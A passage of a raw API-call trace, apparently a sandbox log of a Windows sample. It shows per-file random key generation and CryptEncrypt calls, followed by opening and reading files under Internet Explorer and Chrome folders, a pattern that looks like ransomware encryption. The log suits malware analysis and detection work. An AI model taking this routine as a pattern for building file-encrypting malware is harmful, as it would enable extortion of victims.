[0123.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.352] GetProcessHeap () returned 0x2c0000 [0123.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf7b8 | out: hHeap=0x2c0000) returned 1 [0123.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f870 | out: pbBuffer=0x248f870) returned 1 [0123.352] GetProcessHeap () returned 0x2c0000 [0123.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f868*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f868*=0x30) returned 1 [0123.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsdbgui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.352] GetProcessHeap () returned 0x2c0000 [0123.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.352] GetProcessHeap () returned 0x2c0000 [0123.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fa00 | out: hHeap=0x2c0000) returned 1 [0123.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f870 | out: pbBuffer=0x248f870) returned 1 [0123.352] GetProcessHeap () returned 0x2c0000 [0123.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f868*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f868*=0x30) returned 1 [0123.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.352] GetProcessHeap () returned 0x2c0000 [0123.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.353] GetProcessHeap () returned 0x2c0000 [0123.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f940 | out: hHeap=0x2c0000) returned 1 [0123.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f868 | out: pbBuffer=0x248f868) returned 1 [0123.353] GetProcessHeap () returned 0x2c0000 [0123.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f860*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f860*=0x30) returned 1 [0123.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.353] GetProcessHeap () returned 0x2c0000 [0123.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.353] GetProcessHeap () returned 0x2c0000 [0123.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f880 | out: hHeap=0x2c0000) returned 1 [0123.353] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f868 | out: pbBuffer=0x248f868) returned 1 [0123.353] GetProcessHeap () returned 0x2c0000 [0123.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.353] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f860*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f860*=0x30) returned 1 [0123.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.354] GetProcessHeap () returned 0x2c0000 [0123.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.354] GetProcessHeap () returned 0x2c0000 [0123.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f7c0 | out: hHeap=0x2c0000) returned 1 [0123.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f860 | out: pbBuffer=0x248f860) returned 1 [0123.354] GetProcessHeap () returned 0x2c0000 [0123.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.354] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f858*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f858*=0x30) returned 1 [0123.354] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files (x86)\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.355] GetProcessHeap () returned 0x2c0000 [0123.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.355] GetProcessHeap () returned 0x2c0000 [0123.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f640 | out: hHeap=0x2c0000) returned 1 [0123.355] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f860 | out: pbBuffer=0x248f860) returned 1 [0123.355] GetProcessHeap () returned 0x2c0000 [0123.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.355] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f858*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f858*=0x30) returned 1 [0123.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files (x86)\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.355] GetProcessHeap () returned 0x2c0000 [0123.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.355] GetProcessHeap () returned 0x2c0000 [0123.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f700 | out: hHeap=0x2c0000) returned 1 [0123.355] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f858 | out: pbBuffer=0x248f858) returned 1 [0123.355] GetProcessHeap () returned 0x2c0000 [0123.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f850*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f850*=0x30) returned 1 [0123.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files (x86)\\internet explorer\\iedvtool.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.356] GetProcessHeap () returned 0x2c0000 [0123.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.356] GetProcessHeap () returned 0x2c0000 [0123.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5eec0 | out: hHeap=0x2c0000) returned 1 [0123.356] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f858 | out: pbBuffer=0x248f858) returned 1 [0123.356] GetProcessHeap () returned 0x2c0000 [0123.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.356] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f850*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f850*=0x30) returned 1 [0123.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files (x86)\\internet explorer\\iecompat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.356] GetProcessHeap () returned 0x2c0000 [0123.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.356] GetProcessHeap () returned 0x2c0000 [0123.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f4c0 | out: hHeap=0x2c0000) returned 1 [0123.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f850 | out: pbBuffer=0x248f850) returned 1 [0123.357] GetProcessHeap () returned 0x2c0000 [0123.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.357] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f848*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f848*=0x30) returned 1 [0123.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.357] GetProcessHeap () returned 0x2c0000 [0123.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.357] GetProcessHeap () returned 0x2c0000 [0123.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf948 | out: hHeap=0x2c0000) returned 1 [0123.357] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f850 | out: pbBuffer=0x248f850) returned 1 [0123.357] GetProcessHeap () returned 0x2c0000 [0123.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.357] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f848*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f848*=0x30) returned 1 [0123.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.357] GetProcessHeap () returned 0x2c0000 [0123.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.357] GetProcessHeap () returned 0x2c0000 [0123.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ba98 | out: hHeap=0x2c0000) returned 1 [0123.358] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f848 | out: pbBuffer=0x248f848) returned 1 [0123.358] GetProcessHeap () returned 0x2c0000 [0123.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.358] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f840*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f840*=0x30) returned 1 [0123.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files (x86)\\internet explorer\\extexport.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.358] GetProcessHeap () returned 0x2c0000 [0123.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.358] GetProcessHeap () returned 0x2c0000 [0123.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f580 | out: hHeap=0x2c0000) returned 1 [0123.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f840 | out: pbBuffer=0x248f840) returned 1 [0123.359] GetProcessHeap () returned 0x2c0000 [0123.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f838*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f838*=0x30) returned 1 [0123.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilerui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.360] GetProcessHeap () returned 0x2c0000 [0123.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.360] GetProcessHeap () returned 0x2c0000 [0123.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c6f0 | out: hHeap=0x2c0000) returned 1 [0123.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f840 | out: pbBuffer=0x248f840) returned 1 [0123.360] GetProcessHeap () returned 0x2c0000 [0123.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f838*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f838*=0x30) returned 1 [0123.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsprofilercore.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.361] GetProcessHeap () returned 0x2c0000 [0123.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.361] GetProcessHeap () returned 0x2c0000 [0123.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4a90 | out: hHeap=0x2c0000) returned 1 [0123.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f838 | out: pbBuffer=0x248f838) returned 1 [0123.361] GetProcessHeap () returned 0x2c0000 [0123.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f830*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f830*=0x30) returned 1 [0123.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.361] GetProcessHeap () returned 0x2c0000 [0123.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.361] GetProcessHeap () returned 0x2c0000 [0123.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee47f0 | out: hHeap=0x2c0000) returned 1 [0123.361] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f838 | out: pbBuffer=0x248f838) returned 1 [0123.361] GetProcessHeap () returned 0x2c0000 [0123.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f830*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f830*=0x30) returned 1 [0123.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\jsdbgui.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\jsdbgui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.362] GetProcessHeap () returned 0x2c0000 [0123.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.362] GetProcessHeap () returned 0x2c0000 [0123.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e035a8 | out: hHeap=0x2c0000) returned 1 [0123.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f830 | out: pbBuffer=0x248f830) returned 1 [0123.362] GetProcessHeap () returned 0x2c0000 [0123.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.362] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f828*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f828*=0x30) returned 1 [0123.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.363] GetProcessHeap () returned 0x2c0000 [0123.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.363] GetProcessHeap () returned 0x2c0000 [0123.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e039b8 | out: hHeap=0x2c0000) returned 1 [0123.363] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f830 | out: pbBuffer=0x248f830) returned 1 [0123.363] GetProcessHeap () returned 0x2c0000 [0123.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.363] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f828*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f828*=0x30) returned 1 [0123.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ielowutil.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ielowutil.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.364] GetProcessHeap () returned 0x2c0000 [0123.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.364] GetProcessHeap () returned 0x2c0000 [0123.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c618 | out: hHeap=0x2c0000) returned 1 [0123.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f828 | out: pbBuffer=0x248f828) returned 1 [0123.364] GetProcessHeap () returned 0x2c0000 [0123.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f820*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f820*=0x30) returned 1 [0123.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.365] GetProcessHeap () returned 0x2c0000 [0123.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.365] GetProcessHeap () returned 0x2c0000 [0123.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03a88 | out: hHeap=0x2c0000) returned 1 [0123.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f828 | out: pbBuffer=0x248f828) returned 1 [0123.365] GetProcessHeap () returned 0x2c0000 [0123.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.365] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f820*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f820*=0x30) returned 1 [0123.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iedvtool.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.365] GetProcessHeap () returned 0x2c0000 [0123.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.365] GetProcessHeap () returned 0x2c0000 [0123.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e034d8 | out: hHeap=0x2c0000) returned 1 [0123.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f820 | out: pbBuffer=0x248f820) returned 1 [0123.365] GetProcessHeap () returned 0x2c0000 [0123.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.365] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f818*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f818*=0x30) returned 1 [0123.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.366] GetProcessHeap () returned 0x2c0000 [0123.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.366] GetProcessHeap () returned 0x2c0000 [0123.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e045e8 | out: hHeap=0x2c0000) returned 1 [0123.368] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f818 | out: pbBuffer=0x248f818) returned 1 [0123.368] GetProcessHeap () returned 0x2c0000 [0123.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.368] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f810*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f810*=0x30) returned 1 [0123.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\tonyvalveshealthcare.exe" (normalized: "c:\\program files (x86)\\google\\tonyvalveshealthcare.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0123.368] GetProcessHeap () returned 0x2c0000 [0123.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.369] GetProcessHeap () returned 0x2c0000 [0123.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f280 | out: hHeap=0x2c0000) returned 1 [0123.373] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f808 | out: pbBuffer=0x248f808) returned 1 [0123.373] GetProcessHeap () returned 0x2c0000 [0123.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.373] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f800*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f800*=0x30) returned 1 [0123.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0123.373] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma") returned 84 [0123.373] StrStrW (lpFirst="20170605115313.pma", lpSrch=".txt") returned 0x0 [0123.374] GetProcessHeap () returned 0x2c0000 [0123.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0123.374] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f7c4*=0x1ab8, lpOverlapped=0x0) returned 1 [0123.600] SetFilePointerEx (in: 